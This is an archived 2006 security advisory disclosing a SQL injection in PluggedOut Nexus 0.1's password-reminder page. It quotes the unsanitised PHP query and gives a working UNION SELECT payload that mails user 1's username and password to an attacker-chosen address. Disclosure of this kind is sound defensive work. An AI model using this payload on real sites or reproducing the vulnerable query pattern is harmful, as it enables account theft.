[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060302135703.66974.qmail@web33204.mail.mud.yahoo.com>
Date: Thu, 2 Mar 2006 05:57:03 -0800 (PST)
From: h e <het_ebadi@...oo.com>
To: support@...unia.com, admin@...cknews.ws,
"bugs@...uritytracker.com" <bugs@...uritytracker.com>,
"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
"content-editor@...urityfocus.com" <content-editor@...urityfocus.com>,
"editor@...urityfocus.com" <editor@...urityfocus.com>,
"expert@...uriteam.com" <expert@...uriteam.com>,
"news-editor@...urityfocus.com" <news-editor@...urityfocus.com>,
"vuldb@...urityfocus.com" <vuldb@...urityfocus.com>,
"vuln@...unia.com" <vuln@...unia.com>,
"webmaster@...unia.com" <webmaster@...unia.com>,
"webmaster@...urityfocus.com" <webmaster@...urityfocus.com>
Subject: PluggedOut Nexus SQL injection
PluggedOut Nexus SQL injection
Nexus is an open source script you can run on your web
server to give you a community based website
where people can register, search each others
interests, and communicate with one another either
through a private messaging system, or via chat
requests and forums.
Project : PluggedOut Nexus
Version : 0.1
Author : Jonathan Beckett
Home : http://www.pluggedout.com
Credit:
The information has been provided by Hamid Ebadi .
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/
Vulnerable Systems:PluggedOut Nexus 0.1
http://localhost/Nexus/forgotten_password.php
in this address If you fill the private email address
that you used while creating your account into the
form , the server will send you an email to that
address with your login details
Input passed to the "email" parameter in
"forgotten_password.php" isn't properly sanitised
before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.
test:
in E-Mail Address form enter ' and press Send Request
you will redirect to
http://localhost/Nexus/site_problem.php and see :
Problem with Nexus website
A problem has occurred with the Nexus website - this
was not your fault, and the administrators probably
already know about it.
Vulnerable Code: The following lines in
"forgotten_password.php" :
---------------------------~=[Vulnerable
Code]=~---------------------------
if ($_POST["submit"]!=""){
$con = db_connect();
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM
nexus_users WHERE
cEMailPrivate='".$_POST["email"]."'";
$result = mysql_query($sql,$con);
if ($result!=false){
if (mysql_num_rows($result)>0){
$row = mysql_fetch_array($result);
$from = $site_admin_email;
$to = $row["cEMailPrivate"];
$subject = "Reminder Username/Password from
".$site_long_name."";
$body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.\n\n"
."Your account details are as follows;\n"
." Username : ".$row["cUsername"]."\n"
." Password : ".$row["cPassword"]."\n\n"
."If you did not request this reminder message,
please contact the ".$site_long_name." administrator
(".$admin_email.")\n";
send_email($from,$to,$subject,$body);
---------------------------~=[/Vulnerable
Code]=~---------------------------
exploit:
insert this code in E-Mail Address form
(http://localhost/Nexus/forgotten_password.php) :
hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER@...IL.ADDRESS' from
nexus_users WHERE nUserId=1 and '1'='1
and ATTACKER@...IL.ADDRESS recieve email contain
username & password for userID=1 .
Signature
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
Powered by blists - more mailing lists